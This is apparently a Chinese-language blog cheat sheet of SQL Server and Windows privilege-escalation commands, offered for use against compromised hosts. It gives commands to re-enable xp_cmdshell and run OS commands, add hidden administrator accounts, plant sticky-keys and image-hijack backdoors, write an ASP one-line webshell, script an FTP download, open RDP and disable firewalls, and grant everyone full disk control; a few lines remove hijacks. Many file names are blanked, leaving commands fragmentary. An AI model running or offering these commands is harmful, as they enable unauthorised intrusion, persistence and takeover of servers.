SQL提权语句整理

时间:2025-03-19 15:32:26
------------------------------CMD语句---------------------------------------
query user   查看会话


logoff       踢人命令


5下shift后门
系统后门:
copy c:\windows\ c:\windows\system32\
copy c:\windows\system32\ c:\windows\system32\dllcache\
attrib c:\windows\system32\ +h
attrib c:\windows\system32\dllcache\ +h


打开3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


关闭系统防火墙
net stop sharedaccess
net stop policyagent   关闭IPSC


SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE -- 
;EXEC sp_configure   'show advanced options', 0 --


第一步执行:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call
*/
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
第二步执行
EXEC sp_addextendedproc xp_cmdshell,@dllname =''declare @o int


直接加USER:


declare @o int
exec sp_oacreate '', @o out
exec sp_oamethod @o, 'run', NULL, 'net user 123 123 /add & net localgroup administrators 123 /add'




SQL沙盒提权


EXEC .xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0


Select * From OpenRowSet('.4.0',';Database=c:\windows\system32\ias\','select shell("net user admin$ 199181. /add")');


Select * From OpenRowSet('.4.0',';Database=c:\windows\system32\ias\','select shell("net localgroup administrators admin$ /add")');


Select * From OpenRowSet('.4.0',';Database=c:\windows\system32\ias\','select shell("net localgroup Remote Desktop Users 123 /add")');


 
-----------------------------SQL语句--------------------------------------


修改SA密码:
Sp_password 'OldPassword','NewPassword'
sp_password Null,'199181','sa'




《防替换SHIFT》加属性
attrib c:\windows\system32\dllcache\ +h +r +s 
attrib c:\windows\system32\ +h +r +s


《防替换》去属性
attrib c:\windows\system32\ -h -r -s
attrib c:\windows\system32\dllcache\ -h -r -s


shift后门:
%SystemRoot%\


查询分离器SHIFT:
declare @o int 
exec sp_oacreate '', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\' ,'c:\windows\system32\'


declare @oo int 
exec sp_oacreate '', @oo out 
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\' ,'c:\windows\system32\dllcache\'


WIN2000直接建立用户:
exec xp_cmdshell 'net user admin$ 199181 /add' 
exec xp_cmdshell 'net localGroup Administrators admin$ /add' 


起用用户:
net user admin$ /active:yes 


查看3389终端:
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'


269998505
查看配置
systeminfo
劫持地址查看
-----------------------------SQL修复-----------------------------------------------
ipconfig :查看本地ip地址
type c:\
                         解决127错误


第一步先删除:
drop procedure sp_addextendedproc 
drop procedure sp_oacreate 
exec sp_dropextendedproc 'xp_cmdshell'


第二步恢复:
dbcc addextendedproc ("sp_oacreate","") 
dbcc addextendedproc ("xp_cmdshell","")


第一
exec sp_dropextendedproc 'xp_cmdshell'


第二
dbcc addextendedproc ("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\")
;EXEC sp_configure   'show advanced options', 0 --


查看系统属性


EXEC xp_msver


declare @o int, @f int, @t int, @ret int
exec sp_oacreate '', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\', 10
exec @ret = sp_oamethod @f, 'writeline', NULL,'open xabc.'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'binary'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get c:\'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
exec @ret = sp_oamethod @f, 'writeline', NULL,''
exec @ret = sp_oamethod @f, 'writeline', NULL,''
exec @ret = sp_oamethod @f, 'writeline', NULL,'exit'




普通CMD后门
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\','debugger','reg_sz','c:\windows\system32\'


SQL写一句话
exec .xp_subdirs 'd:\web\cdlxkj'; 
exec sp_makewebtask 'd:\web\cdlxkj\','select''<%execute(request("SB"))%>'' '




映象劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\'
   


命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\','Debugger'


命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\', 
'Debugger','REG_SZ','C:\WINDOWS\system32\'


命令删除注册表粘滞键的劫持功能护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\'
sql写文件〈写完后直接执行c:\完成后建立user:test pass:1234>
declare @o int, @f int, @t int, @ret int
exec sp_oacreate '', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,' "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,' '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,' os&"/test"'




无NET提权的脚本


struser=(0)
strpass=(1)


set lp=createObject("") 
oz="WinNT://"& 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=("user",struser) 
strpass 
 
Set of=GetObject(oz&"/" & struser & ",user") 
() 


For Each admin in
if struser= then
struser & " 建立成功!"

end if
Next


struser & " 用户建立失败!"
将以上保存为文件
然后执行:cscript 用户名 密码




1433无命令添加用户
用法很简单
扫到1433弱口令
net被禁止了的
把这个文件传到任何盘
然后输入命令"盘符+文件名+帐号+密码" 
如 c:\ jksing jksing"
会自动添加到administrators组


type C:\ 系统
netstat -an 是查看服务器开放的端口
Ipconfig 本机IP ipconfig/all
net user admin 1985117 /add 这个就是添加管理员的dos口令admin$是用户名后面加个$号
net localgroup administrators admin /add这是dos下提升管理的口令
net user 要删除的用户名 /del
regedit 打开注册表
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享
net use c: /del  删除映射的c盘 net use * /del /y删除全部
net start telnet                                   启动 Telnet 服务  
net start Server                                   启动 Server 服务 (IPC$ 和共享要靠这个服务)
net stop Messenger                                 停止信使服务(不会在有烦人的Win的弹出广告了)!
net stop  server                                   停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)      
net user                                           得到本地主机的用户列表




开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
更改终端端口为20008(0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f


4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@,-22009 /f




5.开启Win2000的终端,端口为3389(需重启)
echo Windows Registry Editor Version 5.00 > 
echo. >>
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >> 
echo "Enabled"="0" >> 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> 
echo "ShutdownWithoutLogon"="0" >> 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> 
echo "EnableAdminTSRemote"=dword:00000001 >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 
echo "TSEnabled"=dword:00000001 >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >> 
echo "Start"=dword:00000002 >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >> 
echo "Start"=dword:00000002 >> 
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >> 
echo "Hotkey"="1" >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 
echo "PortNumber"=dword:00000D3D >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 
echo "PortNumber"=dword:00000D3D >>


6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
@ECHO OFF & cd/d %temp% & echo [version] >
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >>
echo [defaultinstall] >>
rundll32 setupapi,%inf% 1 %temp%\


7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f


8.终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console


9.调整NTFS分区权限
cacls c: /e /t /g everyone:F     (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone     (拒绝所有人访问system32中exe文件)




首先开启三个服务

Browser



相关文章